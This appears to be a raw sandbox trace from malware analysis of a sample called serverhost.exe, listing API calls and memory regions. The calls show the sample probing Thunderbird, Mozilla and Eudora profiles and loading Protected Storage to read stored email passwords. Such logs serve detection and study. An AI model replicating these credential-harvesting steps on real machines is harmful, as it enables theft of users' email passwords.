[0085.689] EnumResourceNamesA (hModule=0x400000, lpType=0x9, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0085.690] FindResourceA (hModule=0x400000, lpName=0x67, lpType=0x9) returned 0x419658 [0085.690] SizeofResource (hModule=0x400000, hResInfo=0x419658) returned 0x50 [0085.690] LoadResource (hModule=0x400000, hResInfo=0x419658) returned 0x41ba50 [0085.690] LockResource (hResData=0x41ba50) returned 0x41ba50 [0085.690] EnumResourceNamesA (hModule=0x400000, lpType=0xc, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0085.690] FindResourceA (hModule=0x400000, lpName=0x67, lpType=0xc) returned 0x419668 [0085.690] SizeofResource (hModule=0x400000, hResInfo=0x419668) returned 0x14 [0085.690] LoadResource (hModule=0x400000, hResInfo=0x419668) returned 0x41baa0 [0085.690] LockResource (hResData=0x41baa0) returned 0x41baa0 [0085.690] EnumResourceNamesA (hModule=0x400000, lpType=0xe, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0085.690] FindResourceA (hModule=0x400000, lpName=0x65, lpType=0xe) returned 0x419678 [0085.690] SizeofResource (hModule=0x400000, hResInfo=0x419678) returned 0x22 [0085.690] LoadResource (hModule=0x400000, hResInfo=0x419678) returned 0x41bab4 [0085.690] LockResource (hResData=0x41bab4) returned 0x41bab4 [0085.690] FindResourceA (hModule=0x400000, lpName=0x66, lpType=0xe) returned 0x419688 [0085.690] SizeofResource (hModule=0x400000, hResInfo=0x419688) returned 0x14 [0085.690] LoadResource (hModule=0x400000, hResInfo=0x419688) returned 0x41bad8 [0085.690] LockResource (hResData=0x41bad8) returned 0x41bad8 [0085.690] EnumResourceNamesA (hModule=0x400000, lpType=0x10, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0085.690] FindResourceA (hModule=0x400000, lpName=0x1, lpType=0x10) returned 0x419698 [0085.690] SizeofResource (hModule=0x400000, hResInfo=0x419698) returned 0x26c [0085.690] LoadResource (hModule=0x400000, hResInfo=0x419698) returned 0x41baec [0085.690] LockResource (hResData=0x41baec) returned 0x41baec [0085.690] EnumResourceNamesA (hModule=0x400000, lpType=0x18, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0085.690] FindResourceA (hModule=0x400000, lpName=0x1, lpType=0x18) returned 0x4196a8 [0085.690] SizeofResource (hModule=0x400000, hResInfo=0x4196a8) returned 0x16a [0085.690] LoadResource (hModule=0x400000, hResInfo=0x4196a8) returned 0x41bd58 [0085.690] LockResource (hResData=0x41bd58) returned 0x41bd58 [0085.691] LoadStringA (in: hInstance=0x400000, uID=0x3e9, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Name") returned 0x4 [0085.691] LoadStringA (in: hInstance=0x400000, uID=0x3e9, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Name") returned 0x4 [0085.691] LoadStringA (in: hInstance=0x400000, uID=0x3ea, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Application") returned 0xb [0085.691] LoadStringA (in: hInstance=0x400000, uID=0x3ea, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Application") returned 0xb [0085.691] LoadStringA (in: hInstance=0x400000, uID=0x3eb, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Email") returned 0x5 [0085.691] LoadStringA (in: hInstance=0x400000, uID=0x3eb, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Email") returned 0x5 [0085.691] LoadStringA (in: hInstance=0x400000, uID=0x3ec, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Server") returned 0x6 [0085.691] LoadStringA (in: hInstance=0x400000, uID=0x3ec, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Server") returned 0x6 [0085.691] LoadStringA (in: hInstance=0x400000, uID=0x3f1, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Server Port") returned 0xb [0085.691] LoadStringA (in: hInstance=0x400000, uID=0x3f1, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Server Port") returned 0xb [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3f2, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Secured") returned 0x7 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3f2, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Secured") returned 0x7 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3ed, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Type") returned 0x4 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3ed, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Type") returned 0x4 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3ee, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="User") returned 0x4 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3ee, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="User") returned 0x4 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3ef, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Password") returned 0x8 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3ef, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Password") returned 0x8 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3f0, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Profile") returned 0x7 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3f0, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Profile") returned 0x7 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3f3, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Password Strength") returned 0x11 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3f3, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="Password Strength") returned 0x11 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3f4, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="SMTP Server") returned 0xb [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3f4, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="SMTP Server") returned 0xb [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3f5, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="SMTP Server Port") returned 0x10 [0085.692] LoadStringA (in: hInstance=0x400000, uID=0x3f5, lpBuffer=0x3fc630, cchBufferMax=4095 | out: lpBuffer="SMTP Server Port") returned 0x10 [0085.693] GetVersionExA (in: lpVersionInformation=0x418118*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x418118*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0085.693] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x22f65c, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 1 [0085.710] strlen (_Str="Mozilla\\Profiles") returned 0x10 [0085.710] strlen (_Str="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0085.710] _mbscpy (in: param_1=0x3f2ec8, param_2=0x22f65c | out: param_1=0x3f2ec8) returned 0x3f2ec8 [0085.710] strlen (_Str="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0085.710] _mbscat (in: param_1=0x3f2ec8, param_2=0x414078 | out: param_1=0x3f2ec8) returned 0x3f2ec8 [0085.710] _mbscat (in: param_1=0x3f2ec8, param_2=0x413488 | out: param_1=0x3f2ec8) returned 0x3f2ec8 [0085.710] GetFileAttributesA (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\profiles")) returned 0xffffffff [0085.710] strlen (_Str="Thunderbird\\Profiles") returned 0x14 [0085.710] strlen (_Str="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0085.710] _mbscpy (in: param_1=0x3f2fcd, param_2=0x22f65c | out: param_1=0x3f2fcd) returned 0x3f2fcd [0085.710] strlen (_Str="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0085.710] _mbscat (in: param_1=0x3f2fcd, param_2=0x414078 | out: param_1=0x3f2fcd) returned 0x3f2fcd [0085.710] _mbscat (in: param_1=0x3f2fcd, param_2=0x41349c | out: param_1=0x3f2fcd) returned 0x3f2fcd [0085.710] GetFileAttributesA (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Thunderbird\\Profiles" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\thunderbird\\profiles")) returned 0xffffffff [0085.710] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Qualcomm\\Eudora\\CommandLine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22ef28 | out: phkResult=0x22ef28*=0x0) returned 0x2 [0085.710] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", ulOptions=0x0, samDesired=0x20019, phkResult=0x22ef28 | out: phkResult=0x22ef28*=0x0) returned 0x2 [0085.710] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Thunderbird", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f870 | out: phkResult=0x22f870*=0x0) returned 0x2 [0085.711] ExpandEnvironmentStringsA (in: lpSrc="%programfiles%\\Mozilla Thunderbird", lpDst=0x3f31d7, nSize=0x104 | out: lpDst="C:\\Program Files\\Mozilla Thunderbird") returned 0x25 [0085.711] GetFileAttributesA (lpFileName="C:\\Program Files\\Mozilla Thunderbird" (normalized: "c:\\program files\\mozilla thunderbird")) returned 0xffffffff [0085.711] _strcmpi (_Str1="/stext", _Str2="/scomma") returned 1 [0085.711] _strcmpi (_Str1="/shtml", _Str2="/scomma") returned 1 [0085.711] _strcmpi (_Str1="/sverhtml", _Str2="/scomma") returned 1 [0085.711] _strcmpi (_Str1="/sxml", _Str2="/scomma") returned 1 [0085.711] _strcmpi (_Str1="/stab", _Str2="/scomma") returned 1 [0085.711] _strcmpi (_Str1="/scomma", _Str2="/scomma") returned 0 [0085.711] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f554, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0085.711] _mbscat (in: param_1=0x22f554, param_2=0x414450 | out: param_1=0x22f554) returned 0x22f554 [0085.711] _mbscpy (in: param_1=0x22f664, param_2=0x22f554 | out: param_1=0x22f664) returned 0x22f664 [0085.711] _mbscpy (in: param_1=0x22f769, param_2=0x414458 | out: param_1=0x22f769) returned 0x22f769 [0085.711] GetPrivateProfileIntA (lpAppName="General", lpKeyName="ShowGridLines", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.711] GetPrivateProfileIntA (lpAppName="General", lpKeyName="SaveFilterIndex", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.711] GetPrivateProfileIntA (lpAppName="General", lpKeyName="AddExportHeaderLine", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.711] GetPrivateProfileIntA (lpAppName="General", lpKeyName="MarkOddEvenRows", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.711] GetPrivateProfileStringA (in: lpAppName="General", lpKeyName="WinPos", lpDefault="", lpReturnedString=0x22d514, nSize=0x2000, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg" | out: lpReturnedString="") returned 0x0 [0085.712] strlen (_Str="") returned 0x0 [0085.712] GetPrivateProfileStringA (in: lpAppName="General", lpKeyName="Columns", lpDefault="", lpReturnedString=0x22d504, nSize=0x2000, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg" | out: lpReturnedString="") returned 0x0 [0085.712] strlen (_Str="") returned 0x0 [0085.712] GetPrivateProfileIntA (lpAppName="General", lpKeyName="Sort", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.712] _mbsicmp (_Str1=0x4143d4, _Str2=0x3f34f8) returned 1 [0085.712] _mbsicmp (_Str1=0x4143d4, _Str2=0x3f3500) returned -1 [0085.712] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0085.712] SetCursor (hCursor=0x10007) returned 0x10007 [0085.712] LoadLibraryA (lpLibFileName="pstorec.dll") returned 0x71ec0000 [0085.843] GetProcAddress (hModule=0x71ec0000, lpProcName="PStoreCreateInstance") returned 0x71ec526c [0085.843] PStoreCreateInstance () Process: id = "13" image_name = "serverhost.exe" filename = "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe" page_root = "0x7eef76c0" os_pid = "0xc58" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xc18" cmd_line = "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" \"C:\\ProgramData\\C572.tmp\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1843 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1844 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1845 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1846 start_va = 0x400000 end_va = 0x418fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1847 start_va = 0xc40000 end_va = 0xc5afff entry_point = 0xc41d90 region_type = mapped_file name = "serverhost.exemh.exe" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exeMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exemh.exe") Region: id = 1848 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1849 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1850 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1851 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1852 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1876 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1877 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1878 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1879 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1880 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1881 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1885 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1886 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1887 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1888 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1889 start_va = 0x420000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1890 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1891 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1892 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1893 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1894 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1895 start_va = 0x40000 end_va = 0x5cfff entry_point = 0x41355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1896 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1897 start_va = 0x40000 end_va = 0x5cfff entry_point = 0x41355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1898 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1899 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1900 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1901 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1902 start_va = 0xc60000 end_va = 0x185ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 1906 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1907 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 1908 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1909 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1974 start_va = 0x63430000 end_va = 0x637fefff entry_point = 0x63430000 region_type = mapped_file name = "olmapi32.dll" filename = "\\PROGRA~1\\MICROS~1\\Office15\\OLMAPI32.DLL" (normalized: "c:\\progra~1\\micros~1\\office15\\olmapi32.dll") Region: id = 1990 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1991 start_va = 0x712a0000 end_va = 0x7135efff entry_point = 0x712b1dfc region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 1992 start_va = 0x73840000 end_va = 0x739cffff entry_point = 0x738dd026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 1993 start_va = 0x74940000 end_va = 0x74948fff entry_point = 0x74941220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1994 start_va = 0x71230000 end_va = 0x71298fff entry_point = 0x71263cf4 region_type = mapped_file name = "msvcp100.dll" filename = "\\Windows\\System32\\msvcp100.dll" (normalized: "c:\\windows\\system32\\msvcp100.dll") Region: id = 1995 start_va = 0x610000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1996 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1997 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 1998 start_va = 0x710000 end_va = 0x9defff entry_point = 0x710000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1999 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742de6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2000 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x2c0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2001 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 2002 start_va = 0x530000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2003 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2004 start_va = 0x570000 end_va = 0x5cbfff entry_point = 0x5935b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2005 start_va = 0xa50000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 2006 start_va = 0x570000 end_va = 0x5cbfff entry_point = 0x5935b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2007 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739da2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2008 start_va = 0xaf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 2009 start_va = 0x610000 end_va = 0x6eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2010 start_va = 0x700000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 2011 start_va = 0x68e00000 end_va = 0x6a6e3fff entry_point = 0x69546ebb region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll") Region: id = 2012 start_va = 0x2c0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 2013 start_va = 0x71fc0000 end_va = 0x71fc4fff entry_point = 0x71fc10f6 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 2014 start_va = 0x2e0000 end_va = 0x2e9fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 2015 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2016 start_va = 0x570000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2017 start_va = 0x70fc0000 end_va = 0x711fffff entry_point = 0x70fc66bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 2018 start_va = 0x70ac0000 end_va = 0x70fbffff entry_point = 0x70ac0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf") Region: id = 2019 start_va = 0x6f350000 end_va = 0x6f483fff entry_point = 0x6f350000 region_type = mapped_file name = "mapir.dll" filename = "\\PROGRA~1\\MICROS~1\\Office15\\1033\\MAPIR.DLL" (normalized: "c:\\progra~1\\micros~1\\office15\\1033\\mapir.dll") Region: id = 2020 start_va = 0xaf0000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 2021 start_va = 0xbf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 2022 start_va = 0x1860000 end_va = 0x205ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001860000" filename = "" Region: id = 2023 start_va = 0x570000 end_va = 0x572fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2024 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2025 start_va = 0x20c0000 end_va = 0x21bffff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 2026 start_va = 0x2280000 end_va = 0x237ffff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 2027 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 2028 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: 